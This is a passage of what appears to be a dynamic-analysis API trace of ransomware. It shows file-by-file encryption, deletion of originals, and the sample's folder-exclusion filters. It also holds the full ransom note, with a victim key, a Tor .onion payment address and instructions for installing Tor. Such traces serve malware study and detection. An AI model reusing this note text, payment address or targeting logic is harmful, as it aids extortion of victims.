(in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.447] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.447] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.447] GetLastError () returned 0x0 [0170.447] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.447] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.447] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.447] GetLastError () returned 0x0 [0170.447] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.447] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.447] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.447] GetLastError () returned 0x0 [0170.447] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.447] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.447] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.447] GetLastError () returned 0x0 [0170.447] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.447] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.447] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.447] GetLastError () returned 0x0 [0170.447] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.448] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.448] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.448] GetLastError () returned 0x0 [0170.448] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.448] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.448] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.448] GetLastError () returned 0x0 [0170.448] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.448] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.448] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.448] GetLastError () returned 0x0 [0170.448] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.448] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.448] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.448] GetLastError () returned 0x0 [0170.448] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.448] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.448] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.449] GetLastError () returned 0x0 [0170.449] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.449] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.449] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.449] GetLastError () returned 0x0 [0170.449] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.449] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.449] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.449] GetLastError () returned 0x0 [0170.449] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.449] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.449] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.449] GetLastError () returned 0x0 [0170.449] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.449] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.449] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.449] GetLastError () returned 0x0 [0170.449] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.449] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.449] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.450] GetLastError () returned 0x0 [0170.450] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.450] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.450] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.450] GetLastError () returned 0x0 [0170.450] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.450] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.450] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0170.450] GetLastError () returned 0x0 [0170.450] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0170.450] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0170.450] WriteFile (in: hFile=0x15c4, lpBuffer=0x2893368*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0170.451] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\sqlxmlx.rll.mui")) returned 0x20 [0170.451] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui", dwFileAttributes=0x20) returned 0 [0170.452] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui") returned 1 [0170.452] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\sqlxmlx.rll.mui")) returned 0 [0170.452] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui" [0170.452] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US") returned 1 [0170.452] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\.xXD88.tmp" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\.xxd88.tmp")) returned 0xd88 [0170.453] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\sqlxmlx.rll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\.xXD88.tmp" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\.xxd88.tmp"), dwFlags=0x1) returned 0 [0170.453] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\.xXD88.tmp" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\.xxd88.tmp")) returned 1 [0170.454] CryptDestroyKey (hKey=0x9ad678) returned 1 [0170.454] wcslen (_String="OK") returned 0x2 [0170.454] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0170.454] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0170.454] CryptDestroyKey (hKey=0x9ad378) returned 1 [0170.454] CryptDestroyHash (hHash=0x9ad438) returned 1 [0170.454] CryptReleaseContext (hProv=0x8e3088, dwFlags=0x0) returned 1 [0170.454] FindNextFileW (in: hFindFile=0x9ad8b8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0 [0170.454] GetLastError () returned 0x12 [0170.454] FindClose (in: hFindFile=0x9ad8b8 | out: hFindFile=0x9ad8b8) returned 1 [0170.455] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\Recovers your files.html" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0170.455] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0170.456] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0170.456] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0170.456] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0170.456] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0170.456] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0170.456] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0170.456] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0170.457] PathMatchSpecW (pszFile="C:\\Program Files\\Internet Explorer\\*", pszSpec="*.exe") returned 0 [0170.457] PathMatchSpecW (pszFile="C:\\Program Files\\Internet Explorer\\*", pszSpec="*.dll") returned 0 [0170.457] PathMatchSpecW (pszFile="C:\\Program Files\\Internet Explorer\\*", pszSpec="*.lnk") returned 0 [0170.457] PathMatchSpecW (pszFile="C:\\Program Files\\Internet Explorer\\*", pszSpec="*.bat") returned 0 [0170.457] PathMatchSpecW (pszFile="C:\\Program Files\\Internet Explorer\\*", pszSpec="*.ini") returned 0 [0170.457] PathMatchSpecW (pszFile="C:\\Program Files\\Internet Explorer\\*", pszSpec="*.msi") returned 0 [0170.457] PathMatchSpecW (pszFile="C:\\Program Files\\Internet Explorer\\*", pszSpec="*.scf") returned 0 [0170.457] PathMatchSpecW (pszFile="C:\\Program Files\\Internet Explorer\\*", pszSpec="*pagefile.sys*") returned 0 [0170.457] PathMatchSpecW (pszFile="C:\\Program Files\\Internet Explorer\\*", pszSpec="*NTUSER.DAT*") returned 0 [0170.457] PathMatchSpecW (pszFile="C:\\Program Files\\Internet Explorer\\*", pszSpec="*AppData*") returned 0 [0170.457] PathMatchSpecW (pszFile="C:\\Program Files\\Internet Explorer\\*", pszSpec="*\\winrar\\*") returned 0 [0170.457] PathMatchSpecW (pszFile="C:\\Program Files\\Internet Explorer\\*", pszSpec="*\\Internet Explorer\\*") returned 1 [0170.457] wcslen (_String="Stopping because of filters: ") returned 0x1d [0170.457] wcslen (_String="*\\Internet Explorer\\*") returned 0x15 [0170.457] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0170.457] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0170.457] PathMatchSpecW (pszFile="C:\\Program Files\\Java\\*", pszSpec="*.exe") returned 0 [0170.457] PathMatchSpecW (pszFile="C:\\Program Files\\Java\\*", pszSpec="*.dll") returned 0 [0170.457] PathMatchSpecW (pszFile="C:\\Program Files\\Java\\*", pszSpec="*.lnk") returned 0 [0170.457] PathMatchSpecW (pszFile="C:\\Program Files\\Java\\*", pszSpec="*.bat") returned 0 [0170.457] PathMatchSpecW (pszFile="C:\\Program Files\\Java\\*", pszSpec="*.ini") returned 0 [0170.457] PathMatchSpecW (pszFile="C:\\Program Files\\Java\\*", pszSpec="*.msi") returned 0 [0170.457] PathMatchSpecW (pszFile="C:\\Program Files\\Java\\*", pszSpec="*.scf") returned 0 [0170.457] PathMatchSpecW (pszFile="C:\\Program Files\\Java\\*", pszSpec="*pagefile.sys*") returned 0 [0170.457] PathMatchSpecW (pszFile="C:\\Program Files\\Java\\*", pszSpec="*NTUSER.DAT*") returned 0 [0170.457] PathMatchSpecW (pszFile="C:\\Program Files\\Java\\*", pszSpec="*AppData*") returned 0 [0170.457] PathMatchSpecW (pszFile="C:\\Program Files\\Java\\*", pszSpec="*\\winrar\\*") returned 0 [0170.457] PathMatchSpecW (pszFile="C:\\Program Files\\Java\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0170.457] PathMatchSpecW (pszFile="C:\\Program Files\\Java\\*", pszSpec="*\\java\\*") returned 1 [0170.457] wcslen (_String="Stopping because of filters: ") returned 0x1d [0170.457] wcslen (_String="*\\java\\*") returned 0x8 [0170.457] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0170.457] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0170.458] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\*", pszSpec="*.exe") returned 0 [0170.458] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\*", pszSpec="*.dll") returned 0 [0170.458] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\*", pszSpec="*.lnk") returned 0 [0170.458] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\*", pszSpec="*.bat") returned 0 [0170.458] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\*", pszSpec="*.ini") returned 0 [0170.458] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\*", pszSpec="*.msi") returned 0 [0170.458] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\*", pszSpec="*.scf") returned 0 [0170.458] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\*", pszSpec="*pagefile.sys*") returned 0 [0170.458] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\*", pszSpec="*NTUSER.DAT*") returned 0 [0170.458] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\*", pszSpec="*AppData*") returned 0 [0170.458] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\*", pszSpec="*\\winrar\\*") returned 0 [0170.458] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0170.458] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\*", pszSpec="*\\java\\*") returned 0 [0170.458] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0170.458] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\*", pszSpec="*\\windows\\*") returned 0 [0170.458] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\*", pszSpec="*\\ESET\\*") returned 0 [0170.458] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\*", pszSpec="*\\AVG\\*") returned 0 [0170.458] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\*", pszSpec="*\\AVIRA\\*") returned 0 [0170.458] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0170.458] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\*", pszSpec="*Atheros*") returned 0 [0170.458] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\*", pszSpec="*Realtek*") returned 0 [0170.458] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\*", pszSpec="*bootmgr*") returned 0 [0170.458] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\*", pszSpec="*boot*") returned 0 [0170.458] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\*", pszSpec="*boot*") returned 0 [0170.458] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\*", pszSpec="*CONFIG.SYS*") returned 0 [0170.458] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\*", pszSpec="*IO.SYS*") returned 0 [0170.458] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\*", pszSpec="*MSDOS.SYS*") returned 0 [0170.458] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\*", pszSpec="*NTDETECT.COM*") returned 0 [0170.458] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\*", pszSpec="*ntldr*") returned 0 [0170.458] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\*", pszSpec="*chrome*") returned 0 [0170.458] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\*", pszSpec="*opera*") returned 0 [0170.458] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\*", pszSpec="*firefox*") returned 0 [0170.459] wcslen (_String="\\\\?\\") returned 0x4 [0170.459] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\*", 